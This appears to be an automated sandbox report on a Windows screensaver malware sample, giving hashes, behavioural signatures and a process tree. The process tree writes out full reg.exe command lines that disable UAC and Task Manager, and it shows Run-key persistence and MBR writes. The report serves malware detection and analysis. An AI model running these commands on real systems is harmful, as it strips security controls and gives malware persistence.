Resubmissions
01/04/2025, 16:53
250401-vefyvasvg1 1030/03/2025, 21:43
250330-1k85gazm12 1030/03/2025, 21:40
250330-1je51azmy8 10Analysis
-
max time kernel
153s -
max time network
166s -
platform
windows10-ltsc_2021_x64 -
resource
win10ltsc2021-20250314-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system -
submitted
01/04/2025, 16:53
Static task
static1
Behavioral task
behavioral1
Sample
shp.scr
Resource
win10ltsc2021-20250314-en
Errors
General
-
Target
shp.scr
-
Size
214KB
-
MD5
c8b7cf2daca05d5cdaa31939c553b1db
-
SHA1
315c8b4f3719296bfff8e40b01f0d758e13122a3
-
SHA256
2d951b1400ebf4f754965f4e9060b68c3c7fe3d4c2fca75ea564f9d9b79de09b
-
SHA512
6e56a8c0c675dd9e525b4bee0ad9b7fe5820d15592d1773098d61c0d35a4e3f5460e4a76af57e94068b17ab9c38bbd571cae3da699dfe4426cb19112ad452965
-
SSDEEP
6144:dldk1cWQRNTB1M8HySSzCF9NoA/EusgXyAyW:dcv0NTXxH+zkRjskyAyW
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
UAC bypass 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 2 IoCs
pid Process 7988 takeown.exe 8060 icacls.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation sex.exe Key value queried \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000\Control Panel\International\Geo\Nation shp.scr -
Executes dropped EXE 2 IoCs
pid Process 7376 sex.exe 6188 mbr.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 7988 takeown.exe 8060 icacls.exe -
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mbr.exe = "C:\\Windows\\N3OS3X3R\\mbr.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\longlongago = "C:\\Windows\\N3OS3X3R\\cds.bat" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sex.exe = "C:\\Windows\\System32\\sex.exe" reg.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Drops file in System32 directory 9 IoCs
description ioc Process File opened for modification C:\Windows\System32\sex.exe cmd.exe File opened for modification C:\Windows\System32\SwiftHackProtection.pdf.scr cmd.exe File created C:\Windows\SysWOW64\OWFUCK.exe sex.exe File created C:\Windows\SysWOW64\ sex.exe File opened for modification C:\Windows\SysWOW64\ sex.exe File opened for modification C:\Windows\System32\ajae.txt cmd.exe File created C:\Windows\System32\SwiftHackProtection.pdf.scr cmd.exe File created C:\Windows\SysWOW64\rockmymbr.exe sex.exe File created C:\Windows\System32\sex.exe cmd.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\pt_PT\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\bg\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\ur\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\dasherSettingSchema.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\my\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\vi\messages.json msedge.exe File created C:\Windows\N3OS3X3R\shp.scr cmd.exe File opened for modification C:\Windows\SystemTemp msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\fr_CA\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\eu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\hu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\es_419\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\th\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\zh_TW\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\en\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1873789310\deny_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\cs\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\be\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\kk\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\tr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\iw\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\page_embed_script.js msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\ja\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\af\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\sv\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\cy\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\mr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\si\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\pa\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\id\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\te\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\ko\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\en_GB\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\bn\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\ml\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\am\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\el\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\fil\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1471511791\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1853767994\manifest.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1873789310\deny_full_domains.list msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\zh_CN\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\kn\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\sl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1853767994\_metadata\verified_contents.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1853767994\manifest.fingerprint msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1873789310\manifest.fingerprint msedge.exe File created C:\Windows\N3OS3X3R\movie.mpeg.scr cmd.exe File opened for modification C:\Windows\N3OS3X3R\fucker.exe cmd.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\hi\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\fa\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\sr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\fr\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\nl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1897470058\keys.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\en_CA\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\gl\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\offscreendocument.html msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\zu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\hy\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\gu\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\lo\messages.json msedge.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5084_1822473206\_locales\az\messages.json msedge.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 7672 sc.exe 7760 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shp.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sex.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mbr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Delays execution with timeout.exe 31 IoCs
pid Process 2968 timeout.exe 4656 timeout.exe 884 timeout.exe 1776 timeout.exe 5912 timeout.exe 7148 timeout.exe 6564 timeout.exe 6880 timeout.exe 3604 timeout.exe 2948 timeout.exe 3440 timeout.exe 5032 timeout.exe 4932 timeout.exe 5300 timeout.exe 6500 timeout.exe 7800 timeout.exe 4524 timeout.exe 6420 timeout.exe 6540 timeout.exe 6988 timeout.exe 6472 timeout.exe 5060 timeout.exe 4924 timeout.exe 3888 timeout.exe 4920 timeout.exe 6068 timeout.exe 5904 timeout.exe 6844 timeout.exe 1964 timeout.exe 232 timeout.exe 4524 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Kills process with taskkill 1 IoCs
pid Process 8076 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133880000626494903" msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2423602651-1712563293-711691555-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2423602651-1712563293-711691555-1000\{79C103DF-0916-4AC0-AAAE-23FDC410C40F} msedge.exe -
Modifies registry key 1 TTPs 6 IoCs
pid Process 7424 reg.exe 7524 reg.exe 7932 reg.exe 8000 reg.exe 5220 reg.exe 5876 reg.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 1384 NOTEPAD.EXE 7824 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5576 msedge.exe 5576 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs
pid Process 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe 5084 msedge.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: 33 4856 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4856 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5084 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1264 wrote to memory of 1956 1264 shp.scr 82 PID 1264 wrote to memory of 1956 1264 shp.scr 82 PID 1956 wrote to memory of 5196 1956 cmd.exe 85 PID 1956 wrote to memory of 5196 1956 cmd.exe 85 PID 1956 wrote to memory of 1384 1956 cmd.exe 86 PID 1956 wrote to memory of 1384 1956 cmd.exe 86 PID 1956 wrote to memory of 5220 1956 cmd.exe 87 PID 1956 wrote to memory of 5220 1956 cmd.exe 87 PID 1956 wrote to memory of 5876 1956 cmd.exe 88 PID 1956 wrote to memory of 5876 1956 cmd.exe 88 PID 1956 wrote to memory of 4464 1956 cmd.exe 89 PID 1956 wrote to memory of 4464 1956 cmd.exe 89 PID 1956 wrote to memory of 4060 1956 cmd.exe 90 PID 1956 wrote to memory of 4060 1956 cmd.exe 90 PID 1956 wrote to memory of 6012 1956 cmd.exe 91 PID 1956 wrote to memory of 6012 1956 cmd.exe 91 PID 1956 wrote to memory of 4820 1956 cmd.exe 92 PID 1956 wrote to memory of 4820 1956 cmd.exe 92 PID 1956 wrote to memory of 4848 1956 cmd.exe 93 PID 1956 wrote to memory of 4848 1956 cmd.exe 93 PID 1956 wrote to memory of 4936 1956 cmd.exe 94 PID 1956 wrote to memory of 4936 1956 cmd.exe 94 PID 1956 wrote to memory of 5108 1956 cmd.exe 95 PID 1956 wrote to memory of 5108 1956 cmd.exe 95 PID 1956 wrote to memory of 5032 1956 cmd.exe 96 PID 1956 wrote to memory of 5032 1956 cmd.exe 96 PID 1956 wrote to memory of 5084 1956 cmd.exe 99 PID 1956 wrote to memory of 5084 1956 cmd.exe 99 PID 1956 wrote to memory of 5060 1956 cmd.exe 100 PID 1956 wrote to memory of 5060 1956 cmd.exe 100 PID 5084 wrote to memory of 2600 5084 msedge.exe 101 PID 5084 wrote to memory of 2600 5084 msedge.exe 101 PID 5084 wrote to memory of 864 5084 msedge.exe 102 PID 5084 wrote to memory of 864 5084 msedge.exe 102 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103 PID 5084 wrote to memory of 2828 5084 msedge.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\shp.scr"C:\Users\Admin\AppData\Local\Temp\shp.scr" /S1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1264 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4537.tmp\4538.tmp\4539.bat C:\Users\Admin\AppData\Local\Temp\shp.scr /S"2⤵
- Checks computer location settings
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /f /d 13⤵PID:5196
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\ajae.txt3⤵
- Opens file in notepad (likely ransom note)
PID:1384
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:5220
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:5876
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo.vbs"3⤵PID:4464
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo2.vbs"3⤵PID:4060
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo3.vbs"3⤵PID:6012
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo4.vbs"3⤵PID:4820
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo5.vbs"3⤵PID:4848
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo6.vbs"3⤵PID:4936
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo7.vbs"3⤵PID:5108
-
-
C:\Windows\system32\timeout.exetimeout 5 /nobreak3⤵
- Delays execution with timeout.exe
PID:5032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.google.co.ck/search?q=what3⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7fff0d53f208,0x7fff0d53f214,0x7fff0d53f2204⤵PID:2600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:34⤵PID:864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2256,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=2252 /prefetch:24⤵PID:2828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2504,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=2648 /prefetch:84⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:14⤵PID:5176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:14⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4768,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=4900 /prefetch:14⤵PID:6140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4904,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:84⤵PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3580,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:84⤵PID:1500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5656,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:84⤵PID:2632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5848,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=5872 /prefetch:84⤵PID:3572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5848,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=5872 /prefetch:84⤵PID:552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5984,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:84⤵PID:2556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6072,i,13137273342954533772,5304841558445479511,262144 --variations-seed-version --mojo-platform-channel-handle=5980 /prefetch:84⤵PID:5620
-
-
